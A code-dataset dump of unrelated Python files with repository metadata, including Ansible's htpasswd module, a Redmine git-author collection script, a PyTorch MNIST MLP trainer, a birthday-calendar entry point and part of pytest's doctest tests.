                self.threadMonitoring.setPath(path=self.path)
                self.threadMonitoring.start()

    def endMonitoring(self):
        """Stop the worker thread, restore button states, reset tracking state."""
        global flag
        if flag:
            flag = False
            self.threadMonitoring.exit()
            self.btEnd.setEnabled(False)
            self.btStart.setEnabled(True)
        if not flag:
            cleanDictSpeed()
| 41.8 | 191 | 0.527811 |
984e1b1e356b23b0ce904f5c8ff3909af6b45cb4 | 8,684 | py | Python | venv/lib/python2.7/site-packages/ansible/modules/web_infrastructure/htpasswd.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | 37 | 2017-08-15T15:02:43.000Z | 2021-07-23T03:44:31.000Z | venv/lib/python2.7/site-packages/ansible/modules/web_infrastructure/htpasswd.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | 12 | 2018-01-10T05:25:25.000Z | 2021-11-28T06:55:48.000Z | venv/lib/python2.7/site-packages/ansible/modules/web_infrastructure/htpasswd.py | haind27/test01 | 7f86c0a33eb0874a6c3f5ff9a923fd0cfc8ef852 | [
"MIT"
] | 49 | 2017-08-15T09:52:13.000Z | 2022-03-21T17:11:54.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Nimbis Services, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
module: htpasswd
version_added: "1.3"
short_description: manage user files for basic authentication
description:
- Add and remove username/password entries in a password file using htpasswd.
- This is used by web servers such as Apache and Nginx for basic authentication.
options:
path:
required: true
aliases: [ dest, destfile ]
description:
- Path to the file that contains the usernames and passwords
name:
required: true
aliases: [ username ]
description:
- User name to add or remove
password:
required: false
description:
- Password associated with user.
- Must be specified if user does not exist yet.
crypt_scheme:
required: false
choices: ["apr_md5_crypt", "des_crypt", "ldap_sha1", "plaintext"]
default: "apr_md5_crypt"
description:
- Encryption scheme to be used. As well as the four choices listed
here, you can also use any other hash supported by passlib, such as
md5_crypt and sha256_crypt, which are linux passwd hashes. If you
do so the password file will not be compatible with Apache or Nginx
state:
required: false
choices: [ present, absent ]
default: "present"
description:
- Whether the user entry should be present or not
create:
required: false
type: bool
default: "yes"
description:
- Used with C(state=present). If specified, the file will be created
if it does not already exist. If set to "no", will fail if the
file does not exist
notes:
- "This module depends on the I(passlib) Python library, which needs to be installed on all target systems."
- "On Debian, Ubuntu, or Fedora: install I(python-passlib)."
- "On RHEL or CentOS: Enable EPEL, then install I(python-passlib)."
requirements: [ passlib>=1.6 ]
author: "Ansible Core Team"
extends_documentation_fragment: files
"""
EXAMPLES = """
# Add a user to a password file and ensure permissions are set
- htpasswd:
path: /etc/nginx/passwdfile
name: janedoe
password: '9s36?;fyNp'
owner: root
group: www-data
mode: 0640
# Remove a user from a password file
- htpasswd:
path: /etc/apache2/passwdfile
name: foobar
state: absent
# Add a user to a password file suitable for use by libpam-pwdfile
- htpasswd:
path: /etc/mail/passwords
name: alex
password: oedu2eGh
crypt_scheme: md5_crypt
"""
import os
import tempfile
from distutils.version import LooseVersion
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
try:
from passlib.apache import HtpasswdFile, htpasswd_context
from passlib.context import CryptContext
import passlib
except ImportError:
passlib_installed = False
else:
passlib_installed = True
apache_hashes = ["apr_md5_crypt", "des_crypt", "ldap_sha1", "plaintext"]
def create_missing_directories(dest):
    """Ensure the parent directory of *dest* exists, creating it if needed.

    Fixes two defects of the original check-then-makedirs version:
    * when *dest* is a bare filename, ``os.path.dirname`` returns ``''`` and
      ``os.makedirs('')`` raises; now that case is a no-op,
    * a concurrent process creating the directory between the existence check
      and ``makedirs`` no longer causes a spurious ``OSError``.
    """
    destpath = os.path.dirname(dest)
    if destpath and not os.path.exists(destpath):
        try:
            os.makedirs(destpath)
        except OSError:
            # Lost a race with another creator: only re-raise if the
            # directory still does not exist (a genuine failure).
            if not os.path.isdir(destpath):
                raise
def present(dest, username, password, crypt_scheme, create, check_mode):
    """Ensure *username* is present in the htpasswd file at *dest*.

    :param dest: path of the password file
    :param username: user name to add or update
    :param password: plaintext password, hashed with *crypt_scheme*
    :param crypt_scheme: passlib hash scheme name
    :param create: create the file when it does not exist
    :param check_mode: report what would change without writing anything
    :return: tuple ``(msg, changed)``
    """
    # Apache-compatible schemes can use passlib's stock htpasswd context;
    # any other scheme needs a custom context that still accepts the
    # Apache hashes already present in the file.
    if crypt_scheme in apache_hashes:
        context = htpasswd_context
    else:
        context = CryptContext(schemes=[crypt_scheme] + apache_hashes)
    if not os.path.exists(dest):
        if not create:
            raise ValueError('Destination %s does not exist' % dest)
        if check_mode:
            return ("Create %s" % dest, True)
        create_missing_directories(dest)
        # passlib 1.6 renamed the constructor arguments and the password
        # APIs; support both the old and the new interface.
        if LooseVersion(passlib.__version__) >= LooseVersion('1.6'):
            ht = HtpasswdFile(dest, new=True, default_scheme=crypt_scheme, context=context)
        else:
            ht = HtpasswdFile(dest, autoload=False, default=crypt_scheme, context=context)
        if getattr(ht, 'set_password', None):
            ht.set_password(username, password)
        else:
            ht.update(username, password)
        ht.save()
        return ("Created %s and added %s" % (dest, username), True)
    else:
        if LooseVersion(passlib.__version__) >= LooseVersion('1.6'):
            ht = HtpasswdFile(dest, new=False, default_scheme=crypt_scheme, context=context)
        else:
            ht = HtpasswdFile(dest, default=crypt_scheme, context=context)
        found = None
        # check_password (>=1.6) / verify (<1.6): does the stored hash
        # already match this password?
        if getattr(ht, 'check_password', None):
            found = ht.check_password(username, password)
        else:
            found = ht.verify(username, password)
        if found:
            return ("%s already present" % username, False)
        else:
            if not check_mode:
                if getattr(ht, 'set_password', None):
                    ht.set_password(username, password)
                else:
                    ht.update(username, password)
                ht.save()
            return ("Add/update %s" % username, True)
def absent(dest, username, check_mode):
    """Ensure *username* is absent from the htpasswd file at *dest*.

    :param dest: path of the password file (must exist; caller checks)
    :param username: user name to remove
    :param check_mode: report what would change without writing anything
    :return: tuple ``(msg, changed)``
    """
    # passlib 1.6 changed the constructor signature; support both APIs.
    if LooseVersion(passlib.__version__) >= LooseVersion('1.6'):
        ht = HtpasswdFile(dest, new=False)
    else:
        ht = HtpasswdFile(dest)
    if username not in ht.users():
        return ("%s not present" % username, False)
    else:
        if not check_mode:
            ht.delete(username)
            ht.save()
        return ("Remove %s" % username, True)
def check_file_attrs(module, changed, message):
    """Apply the module's file attribute arguments (owner, mode, SELinux
    context, ...) to the target file and fold the result into the status.

    :param module: the AnsibleModule instance driving this run
    :param changed: whether a change was already recorded
    :param message: status message accumulated so far
    :return: tuple ``(message, changed)`` updated with attribute changes
    """
    file_args = module.load_file_common_arguments(module.params)
    attrs_changed = module.set_fs_attributes_if_different(file_args, False)
    if attrs_changed:
        joiner = " and " if changed else ""
        message = message + joiner + "ownership, perms or SE linux context changed"
        changed = True
    return message, changed
def main():
    """Entry point: parse module arguments and enforce the requested state.

    Reads the Ansible argument spec, strips blank lines from any preexisting
    password file (passlib chokes on them), then dispatches to ``present`` /
    ``absent`` and reports the result via ``exit_json`` / ``fail_json``.
    """
    arg_spec = dict(
        path=dict(required=True, aliases=["dest", "destfile"]),
        name=dict(required=True, aliases=["username"]),
        password=dict(required=False, default=None, no_log=True),
        crypt_scheme=dict(required=False, default="apr_md5_crypt"),
        state=dict(required=False, default="present"),
        create=dict(type='bool', default='yes'),
    )
    module = AnsibleModule(argument_spec=arg_spec,
                           add_file_common_args=True,
                           supports_check_mode=True)
    path = module.params['path']
    username = module.params['name']
    password = module.params['password']
    crypt_scheme = module.params['crypt_scheme']
    state = module.params['state']
    create = module.params['create']
    check_mode = module.check_mode
    if not passlib_installed:
        module.fail_json(msg="This module requires the passlib Python library")
    # Check file for blank lines in effort to avoid "need more than 1 value to unpack" error.
    try:
        f = open(path, "r")
    except IOError:
        # No preexisting file to remove blank lines from
        f = None
    else:
        try:
            lines = f.readlines()
        finally:
            f.close()
        # If the file gets edited, it returns true, so only edit the file if it has blank lines
        strip = False
        for line in lines:
            if not line.strip():
                strip = True
                break
        if strip:
            # If check mode, create a temporary file
            # (so the real password file is left untouched)
            if check_mode:
                temp = tempfile.NamedTemporaryFile()
                path = temp.name
            f = open(path, "w")
            try:
                [f.write(line) for line in lines if line.strip()]
            finally:
                f.close()
    try:
        if state == 'present':
            (msg, changed) = present(path, username, password, crypt_scheme, create, check_mode)
        elif state == 'absent':
            if not os.path.exists(path):
                module.exit_json(msg="%s not present" % username,
                                 warnings="%s does not exist" % path, changed=False)
            (msg, changed) = absent(path, username, check_mode)
        else:
            module.fail_json(msg="Invalid state: %s" % state)
        # Apply owner/mode/SELinux attributes requested via the common file args.
        check_file_attrs(module, changed, msg)
        module.exit_json(msg=msg, changed=changed)
    except Exception as e:
        module.fail_json(msg=to_native(e))
if __name__ == '__main__':
main()
| 31.926471 | 110 | 0.630815 |
33d3ad77b7e98a7f0c9621d698f0aed0dca4ca4a | 2,032 | py | Python | get_authors.py | fermi-controls/redmine-git-authors | 2c8d52a7ddcebbd229e9735074e4a8def7e44734 | [
"MIT"
] | null | null | null | get_authors.py | fermi-controls/redmine-git-authors | 2c8d52a7ddcebbd229e9735074e4a8def7e44734 | [
"MIT"
] | null | null | null | get_authors.py | fermi-controls/redmine-git-authors | 2c8d52a7ddcebbd229e9735074e4a8def7e44734 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Get the list of unique authors and contributors from Redmine."""
import json
from pathlib import Path
import subprocess
names = set()
output_path = Path('./authors.txt')
def xlat_with(input_dict):
    """Build a translator over *input_dict*: names with an entry are mapped
    to their replacement, unknown names pass through unchanged."""
    def translate(name):
        return input_dict.get(name, name)
    return translate
def mk_key(combined_name):
    """Sort key for an author name: ``[last, first]``.

    Names that are not exactly two words cannot be split and are keyed under
    '!FIX' so they sort to the top of the output for manual correction.
    """
    try:
        given, family = combined_name.split()
    except ValueError as err:
        print(err, '\n', combined_name)
        # '!' has a low ASCII value, so broken names float to the top
        return ['!FIX', combined_name]
    return [family, given]
# Main script body: for every repo of every project, list the unique commit
# authors/committers over ssh, translate known aliases, and collect the set.
with open('projects.json', encoding='utf8') as f_projects, \
        open('usernames.json', encoding='utf8') as f_usernames:
    projects = json.load(f_projects)
    usernames_map = json.load(f_usernames)
    usernames = usernames_map.keys()  # NOTE(review): unused below — candidate for removal
    for project in projects.keys():
        for repo in projects[project]:
            # '%an%n%cn' prints author and committer names, one per line;
            # the sort -u runs on the remote side of the ssh pipe.
            result = subprocess.run([
                'ssh', '-tx', f'p-{project}@cdcvs.fnal.gov',
                f'git -C /cvs/projects/{repo} log --pretty=\'%an%n%cn\'',
                '|', 'sort', '-u'],
                stdout=subprocess.PIPE, check=True, encoding='utf8')
            # NOTE(review): with check=True a nonzero exit raises
            # CalledProcessError, so this branch looks unreachable — confirm.
            if result.returncode != 0:
                print('Return code', result.returncode, f'{project}/{repo} failed.')
                continue
            if result.stdout.startswith('fatal:'):
                print(f'{project}/{repo} failed.')
                print(result.stdout)
                continue
            results = result.stdout.splitlines()
            # Translate aliases via usernames.json, then merge into the set.
            subbed_names = map(xlat_with(usernames_map), results)
            names |= set(subbed_names)
# Write the sorted author list, one name per line ('!FIX' entries first).
with open(output_path, 'w', encoding='utf8') as f:
    for name in sorted(names, key=mk_key):
        f.write(f'{name}\n')
print('Output author names to', output_path.absolute())
| 31.261538 | 84 | 0.607283 |
1fe4445681c2a5bd1b10ef6585e60db930cd8a10 | 455 | py | Python | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial1_Solution_2a11ec87.py | liuxiaomiao123/NeuroMathAcademy | 16a7969604a300bf9fbb86f8a5b26050ebd14c65 | [
"CC-BY-4.0"
] | 2 | 2020-07-03T04:39:09.000Z | 2020-07-12T02:08:31.000Z | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial1_Solution_2a11ec87.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2020-06-22T22:57:03.000Z | 2020-06-22T22:57:03.000Z | tutorials/W3D4_DeepLearning1/solutions/W3D4_Tutorial1_Solution_2a11ec87.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2021-03-29T21:08:26.000Z | 2021-03-29T21:08:26.000Z | def plot_tuning():
"""Plot the tuning curve of a random neuron"""
neuron_indx = np.random.choice(n_neurons) # pick random neuron
plt.plot(np.rad2deg(stimuli), resp[:, neuron_indx], '.') # plot its responses as a function of stimulus orientation
plt.title('neuron %i' % neuron_indx)
plt.xlabel('stimulus orientation ($^o$)')
plt.ylabel('neural response')
plt.xticks(np.linspace(0, 360, 5))
plt.show()
with plt.xkcd():
plot_tuning() | 32.5 | 118 | 0.69011 |
9d394e96942e4c5f65e52e1f00e476f2d4883fa9 | 6,542 | py | Python | mlp/mlp.py | Yuxiang-Wei/DeepLearning | 5ad27384a6b45b97700094fe979a67b0d1522be8 | [
"MIT"
] | 7 | 2019-06-28T15:21:20.000Z | 2020-04-22T14:35:35.000Z | mlp/mlp.py | csyxwei/DeepLearning | 5ad27384a6b45b97700094fe979a67b0d1522be8 | [
"MIT"
] | null | null | null | mlp/mlp.py | csyxwei/DeepLearning | 5ad27384a6b45b97700094fe979a67b0d1522be8 | [
"MIT"
] | 1 | 2019-07-02T03:33:37.000Z | 2019-07-02T03:33:37.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 19-5-10
# @Author : wyxiang
# @File : mlp.py
# @Env: Ubuntu16.04 Python3.6 Pytorch0.4.1
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import datasets, transforms
from torch.utils.data.dataloader import DataLoader
from optparse import OptionParser
import os
# Use the GPU when CUDA is available, otherwise fall back to the CPU
if torch.cuda.is_available():
    device = torch.device('cuda')
else:
    device = torch.device('cpu')
print('Using PyTorch version:', torch.__version__, ' Device:', device)
img_size = 28  # MNIST images are 28x28 pixels
output_size = 10  # ten digit classes
model_dir = './checkpoints/lastest.pkl'  # checkpoint path ('lastest' spelling kept — train() saves under this name)
# 定义模型
class MLP(nn.Module):
    """Three-layer fully connected classifier for 28x28 MNIST images."""
    def __init__(self):
        super(MLP, self).__init__()
        self.linear1 = nn.Linear(img_size * img_size, 1024)  # hidden layer 1: [784] -> [1024]
        self.linear2 = nn.Linear(1024, 256)  # hidden layer 2: [1024] -> [256]
        self.linear3 = nn.Linear(256, output_size)  # output layer: [256] -> [10]
    def forward(self, x):
        # Flatten the image to match the input layer:
        # [batch, 1, img_size, img_size] -> [batch, img_size*img_size]
        x = x.view(-1, img_size * img_size)
        x = F.relu(self.linear1(x))  # hidden layer 1 with ReLU activation
        x = F.relu(self.linear2(x))  # hidden layer 2 with ReLU activation
        return F.log_softmax(self.linear3(x), dim=1)  # log-softmax over the 10 classes
def load_data(train=True, batch_size=50):
    """
    Load the MNIST dataset.
    :param train: True for the train/validation split, False for the test set
    :param batch_size: batch size of the returned loaders
    :return: (train_loader, val_loader) when train=True, else (test_loader, None)
    """
    # Load MNIST, downloading it first if it is not present locally
    dataset = datasets.MNIST('./data',
                             train=train,
                             download=True,
                             transform=transforms.ToTensor())
    if train:
        # Split into a 50k training set and a 10k validation set
        train, val = torch.utils.data.random_split(dataset, [50000, 10000])
        # Shuffle the training set
        train_loader = DataLoader(dataset=train,
                                  batch_size=batch_size,
                                  shuffle=True)
        # Prepare the validation set
        val_loader = DataLoader(dataset=val,
                                batch_size=batch_size,
                                shuffle=True)
        return train_loader, val_loader
    else:
        # Prepare the test set (no shuffling needed for evaluation)
        test_loader = DataLoader(dataset=dataset,
                                 batch_size=batch_size,
                                 shuffle=False)
        return test_loader, None
def train(model, epochs, batch_size, lr, log_interval=200):
    """
    Train the network.
    :param model: network to train
    :param epochs: number of epochs
    :param batch_size: batch size
    :param lr: learning rate
    :param log_interval: number of batches between loss printouts
    :return:
    """
    # Load the training and validation sets
    train_loader, val_loader = load_data(train=True, batch_size=batch_size)
    # Use the Adam optimizer
    optimizer = torch.optim.Adam(model.parameters(), lr=lr)
    # optimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.5)
    # Use cross-entropy loss
    criterion = nn.CrossEntropyLoss()
    for i in range(1, epochs + 1):
        # Put the model into training mode
        model.train()
        # Iterate over the batches
        for batch_idx, (data, target) in enumerate(train_loader):
            # Move the batch to the GPU when one is available
            data = data.to(device)
            target = target.to(device)
            # Clear the accumulated gradients
            optimizer.zero_grad()
            # Forward pass
            output = model(data)
            # Compute the loss
            loss = criterion(output, target)
            # Backward pass
            loss.backward()
            # Update the weights
            optimizer.step()
            # Periodically print training progress
            if batch_idx % log_interval == 0:
                print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
                    i, batch_idx * len(data), len(train_loader.dataset),
                    100. * batch_idx / len(train_loader), loss.data.item()))
        # Save the model parameters once per epoch
        save_dir = './checkpoints'
        if not os.path.exists(save_dir):
            os.makedirs(save_dir)
        torch.save(model.state_dict(), os.path.join(save_dir, 'lastest.pkl'))
        # Report accuracy on the validation set after each epoch
        validate(model, val_loader, criterion)
def test(model, batch_size):
    """
    Measure the model's accuracy on the test set.
    :param model: model to evaluate
    :param batch_size: batch size
    :return:
    """
    test_loader, _ = load_data(train=False, batch_size=batch_size)
    criterion = nn.CrossEntropyLoss()
    validate(model, test_loader, criterion)
def validate(model, data_loader, criterion):
    """
    Measure the model's loss and accuracy on the given data.
    :param model: model to evaluate
    :param data_loader: data to evaluate on
    :param criterion: loss function
    :return:
    """
    # Put the model into evaluation mode
    model.eval()
    val_loss, correct = 0, 0
    for data, target in data_loader:
        # Move the batch to the GPU when one is available
        data = data.to(device)
        target = target.to(device)
        # Forward pass
        output = model(data)
        # Accumulate the loss
        val_loss += criterion(output, target).data.item()
        # Index of the highest score = predicted class
        pred = output.data.max(1)[1]
        # Count correct predictions
        correct += pred.eq(target.data).cpu().sum()
    val_loss /= len(data_loader)
    accuracy = 100. * correct.to(torch.float32) / len(data_loader.dataset)
    print('\nValidation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
        val_loss, correct, len(data_loader.dataset), accuracy))
def get_args():
    """
    Parse command line arguments.
    :return: parsed options object
    """
    parser = OptionParser()
    parser.add_option('-t', '--train', action="store_true", dest='train', default=True,
                      help='train model')
    parser.add_option("-v", '--test', action="store_false", dest="train",
                      help='test model')
    parser.add_option('-e', '--epochs', dest='epochs', default=10, type='int',
                      help='number of epochs')
    parser.add_option('-b', '--batch_size', dest='batchsize', default=50,
                      type='int', help='batch size')
    parser.add_option('-l', '--lr', dest='lr', default=0.001,
                      type='float', help='learning rate')
    (options, args) = parser.parse_args()
    return options
if __name__ == '__main__':
    args = get_args()
    model = MLP().to(device)
    if args.train:
        print(model)
        train(model, epochs=args.epochs, batch_size=args.batchsize, lr=args.lr)
    else:
        # Test mode: load the latest checkpoint and evaluate on the test set
        if not os.path.exists(model_dir):
            print('model not found')
        else:
            model.load_state_dict(torch.load(model_dir))
            test(model, batch_size=args.batchsize)
# Usage examples
### train the model
# python mlp.py --train True --epochs 10 --batch_size 50 --lr 1e-3
### test the model
# python mlp.py --test True --batch_size 50
e1a083851a06d03379c8ce0652a6846ce73ba485 | 2,110 | py | Python | birthday_calendar/__main__.py | Raiytak/Birthday-Calendar | 879a268439503bc3debec9fca6363c9da44829a7 | [
"MIT"
] | null | null | null | birthday_calendar/__main__.py | Raiytak/Birthday-Calendar | 879a268439503bc3debec9fca6363c9da44829a7 | [
"MIT"
] | null | null | null | birthday_calendar/__main__.py | Raiytak/Birthday-Calendar | 879a268439503bc3debec9fca6363c9da44829a7 | [
"MIT"
] | null | null | null | import argparse
from .accessor import BirthdayAccessor
from .convert import convertDictToBirthdays
from .app_shell import AppShell
from .app_func import AppFunctionalities
"""
Main script
Handles the arguments and craetes a mixin with the shell, core functions and accessor
"""
class MainApp(AppFunctionalities, AppShell):
    """Mixin joining the shell UI, core functionality and birthday storage.

    :param birthday_accessor: storage backend for birthday data
    :param birthday_convertor: callable turning raw dicts into Birthday objects
    """
    def __init__(self, birthday_accessor, birthday_convertor, *args, **kwargs):
        self.birthday_accessor = birthday_accessor
        self.birthday_convertor = birthday_convertor
        super().__init__(*args, **kwargs)
    def birthdays_data(self):
        # Bug fix: use the accessor stored on this instance instead of the
        # module-level `birthday_accessor` global, so the class works with
        # whatever accessor was passed to the constructor.
        return self.birthday_accessor.getData()
    def birthdays_data_from_user(self):
        # Same fix as birthdays_data: read from the instance's accessor.
        if self.birthday_accessor.user_file:
            return self.birthday_accessor.getDataOfJson(self.birthday_accessor.user_file)
        return {}
    @property
    def birthdays(self):
        """All stored birthdays, converted to Birthday objects."""
        data = self.birthdays_data()
        return self.birthday_convertor(data)
    @property
    def birthdays_from_user(self):
        """Birthdays from the user-supplied file, converted; empty when none."""
        data = self.birthdays_data_from_user()
        return self.birthday_convertor(data)
    def saveBirthday(self, birthday):
        return self.birthday_accessor.saveBirthday(birthday)
    def saveBirthdayInCache(self, birthday):
        return self.birthday_accessor.saveBirthdayInCache(birthday)
    def deleteIdentifer(self, identifier):
        return self.birthday_accessor.removeBirthdayWithIdentifier(identifier)
    def setUserFilePath(self, path):
        self.birthday_accessor.setUserFilePath(path)
    def clearCache(self):
        self.birthday_accessor.clearCache()
# Command-line interface: optional birthday-data path and year window.
parser = argparse.ArgumentParser()
parser.add_argument(
    "-p",
    "--path",
    help="Path to the json containing the information on the birthdays' person name and date",
    type=str,
)
parser.add_argument(
    "-y",
    "--years",
    help="Number of years around today's year on which the birthdays are added to the calendar (minimum 1)",
    type=int,
)
args = parser.parse_args()
# Wire the storage accessor and converter into the app, then show the calendar.
birthday_accessor = BirthdayAccessor(args.path)
main_app = MainApp(birthday_accessor, convertDictToBirthdays, args.years)
main_app.launchCalendar()
| 28.90411 | 108 | 0.732227 |
b15067f15e9b299586b8c31ce9467c984c2cf2dc | 32,516 | py | Python | tools/third_party/pytest/testing/test_doctest.py | shs96c/web-platform-tests | 61acad6dd9bb99d32340eb41f5146de64f542359 | [
"BSD-3-Clause"
] | 1 | 2018-02-26T09:45:53.000Z | 2018-02-26T09:45:53.000Z | tools/third_party/pytest/testing/test_doctest.py | shs96c/web-platform-tests | 61acad6dd9bb99d32340eb41f5146de64f542359 | [
"BSD-3-Clause"
] | null | null | null | tools/third_party/pytest/testing/test_doctest.py | shs96c/web-platform-tests | 61acad6dd9bb99d32340eb41f5146de64f542359 | [
"BSD-3-Clause"
] | 1 | 2021-04-06T20:06:58.000Z | 2021-04-06T20:06:58.000Z | # encoding: utf-8
from __future__ import absolute_import, division, print_function
import sys
import _pytest._code
from _pytest.compat import MODULE_NOT_FOUND_ERROR
from _pytest.doctest import DoctestItem, DoctestModule, DoctestTextfile
import pytest
class TestDoctests(object):
def test_collect_testtextfile(self, testdir):
w = testdir.maketxtfile(whatever="")
checkfile = testdir.maketxtfile(test_something="""
alskdjalsdk
>>> i = 5
>>> i-1
4
""")
for x in (testdir.tmpdir, checkfile):
# print "checking that %s returns custom items" % (x,)
items, reprec = testdir.inline_genitems(x)
assert len(items) == 1
assert isinstance(items[0], DoctestItem)
assert isinstance(items[0].parent, DoctestTextfile)
# Empty file has no items.
items, reprec = testdir.inline_genitems(w)
assert len(items) == 0
def test_collect_module_empty(self, testdir):
path = testdir.makepyfile(whatever="#")
for p in (path, testdir.tmpdir):
items, reprec = testdir.inline_genitems(p,
'--doctest-modules')
assert len(items) == 0
def test_collect_module_single_modulelevel_doctest(self, testdir):
path = testdir.makepyfile(whatever='""">>> pass"""')
for p in (path, testdir.tmpdir):
items, reprec = testdir.inline_genitems(p,
'--doctest-modules')
assert len(items) == 1
assert isinstance(items[0], DoctestItem)
assert isinstance(items[0].parent, DoctestModule)
def test_collect_module_two_doctest_one_modulelevel(self, testdir):
path = testdir.makepyfile(whatever="""
'>>> x = None'
def my_func():
">>> magic = 42 "
""")
for p in (path, testdir.tmpdir):
items, reprec = testdir.inline_genitems(p,
'--doctest-modules')
assert len(items) == 2
assert isinstance(items[0], DoctestItem)
assert isinstance(items[1], DoctestItem)
assert isinstance(items[0].parent, DoctestModule)
assert items[0].parent is items[1].parent
def test_collect_module_two_doctest_no_modulelevel(self, testdir):
path = testdir.makepyfile(whatever="""
'# Empty'
def my_func():
">>> magic = 42 "
def unuseful():
'''
# This is a function
# >>> # it doesn't have any doctest
'''
def another():
'''
# This is another function
>>> import os # this one does have a doctest
'''
""")
for p in (path, testdir.tmpdir):
items, reprec = testdir.inline_genitems(p,
'--doctest-modules')
assert len(items) == 2
assert isinstance(items[0], DoctestItem)
assert isinstance(items[1], DoctestItem)
assert isinstance(items[0].parent, DoctestModule)
assert items[0].parent is items[1].parent
def test_simple_doctestfile(self, testdir):
p = testdir.maketxtfile(test_doc="""
>>> x = 1
>>> x == 1
False
""")
reprec = testdir.inline_run(p, )
reprec.assertoutcome(failed=1)
def test_new_pattern(self, testdir):
p = testdir.maketxtfile(xdoc="""
>>> x = 1
>>> x == 1
False
""")
reprec = testdir.inline_run(p, "--doctest-glob=x*.txt")
reprec.assertoutcome(failed=1)
def test_multiple_patterns(self, testdir):
"""Test support for multiple --doctest-glob arguments (#1255).
"""
testdir.maketxtfile(xdoc="""
>>> 1
1
""")
testdir.makefile('.foo', test="""
>>> 1
1
""")
testdir.maketxtfile(test_normal="""
>>> 1
1
""")
expected = set(['xdoc.txt', 'test.foo', 'test_normal.txt'])
assert set(x.basename for x in testdir.tmpdir.listdir()) == expected
args = ["--doctest-glob=xdoc*.txt", "--doctest-glob=*.foo"]
result = testdir.runpytest(*args)
result.stdout.fnmatch_lines([
'*test.foo *',
'*xdoc.txt *',
'*2 passed*',
])
result = testdir.runpytest()
result.stdout.fnmatch_lines([
'*test_normal.txt *',
'*1 passed*',
])
@pytest.mark.parametrize(
' test_string, encoding',
[
(u'foo', 'ascii'),
(u'öäü', 'latin1'),
(u'öäü', 'utf-8')
]
)
def test_encoding(self, testdir, test_string, encoding):
"""Test support for doctest_encoding ini option.
"""
testdir.makeini("""
[pytest]
doctest_encoding={0}
""".format(encoding))
doctest = u"""
>>> u"{0}"
{1}
""".format(test_string, repr(test_string))
testdir._makefile(".txt", [doctest], {}, encoding=encoding)
result = testdir.runpytest()
result.stdout.fnmatch_lines([
'*1 passed*',
])
def test_doctest_unexpected_exception(self, testdir):
testdir.maketxtfile("""
>>> i = 0
>>> 0 / i
2
""")
result = testdir.runpytest("--doctest-modules")
result.stdout.fnmatch_lines([
"*unexpected_exception*",
"*>>> i = 0*",
"*>>> 0 / i*",
"*UNEXPECTED*ZeroDivision*",
])
def test_docstring_partial_context_around_error(self, testdir):
"""Test that we show some context before the actual line of a failing
doctest.
"""
testdir.makepyfile('''
def foo():
"""
text-line-1
text-line-2
text-line-3
text-line-4
text-line-5
text-line-6
text-line-7
text-line-8
text-line-9
text-line-10
text-line-11
>>> 1 + 1
3
text-line-after
"""
''')
result = testdir.runpytest('--doctest-modules')
result.stdout.fnmatch_lines([
'*docstring_partial_context_around_error*',
'005*text-line-3',
'006*text-line-4',
'013*text-line-11',
'014*>>> 1 + 1',
'Expected:',
' 3',
'Got:',
' 2',
])
# lines below should be trimmed out
assert 'text-line-2' not in result.stdout.str()
assert 'text-line-after' not in result.stdout.str()
def test_docstring_full_context_around_error(self, testdir):
"""Test that we show the whole context before the actual line of a failing
doctest, provided that the context is up to 10 lines long.
"""
testdir.makepyfile('''
def foo():
"""
text-line-1
text-line-2
>>> 1 + 1
3
"""
''')
result = testdir.runpytest('--doctest-modules')
result.stdout.fnmatch_lines([
'*docstring_full_context_around_error*',
'003*text-line-1',
'004*text-line-2',
'006*>>> 1 + 1',
'Expected:',
' 3',
'Got:',
' 2',
])
def test_doctest_linedata_missing(self, testdir):
testdir.tmpdir.join('hello.py').write(_pytest._code.Source("""
class Fun(object):
@property
def test(self):
'''
>>> a = 1
>>> 1/0
'''
"""))
result = testdir.runpytest("--doctest-modules")
result.stdout.fnmatch_lines([
"*hello*",
"*EXAMPLE LOCATION UNKNOWN, not showing all tests of that example*",
"*1/0*",
"*UNEXPECTED*ZeroDivision*",
"*1 failed*",
])
def test_doctest_unex_importerror_only_txt(self, testdir):
testdir.maketxtfile("""
>>> import asdalsdkjaslkdjasd
>>>
""")
result = testdir.runpytest()
# doctest is never executed because of error during hello.py collection
result.stdout.fnmatch_lines([
"*>>> import asdals*",
"*UNEXPECTED*{e}*".format(e=MODULE_NOT_FOUND_ERROR),
"{e}: No module named *asdal*".format(e=MODULE_NOT_FOUND_ERROR),
])
def test_doctest_unex_importerror_with_module(self, testdir):
testdir.tmpdir.join("hello.py").write(_pytest._code.Source("""
import asdalsdkjaslkdjasd
"""))
testdir.maketxtfile("""
>>> import hello
>>>
""")
result = testdir.runpytest("--doctest-modules")
# doctest is never executed because of error during hello.py collection
result.stdout.fnmatch_lines([
"*ERROR collecting hello.py*",
"*{e}: No module named *asdals*".format(e=MODULE_NOT_FOUND_ERROR),
"*Interrupted: 1 errors during collection*",
])
def test_doctestmodule(self, testdir):
p = testdir.makepyfile("""
'''
>>> x = 1
>>> x == 1
False
'''
""")
reprec = testdir.inline_run(p, "--doctest-modules")
reprec.assertoutcome(failed=1)
def test_doctestmodule_external_and_issue116(self, testdir):
p = testdir.mkpydir("hello")
p.join("__init__.py").write(_pytest._code.Source("""
def somefunc():
'''
>>> i = 0
>>> i + 1
2
'''
"""))
result = testdir.runpytest(p, "--doctest-modules")
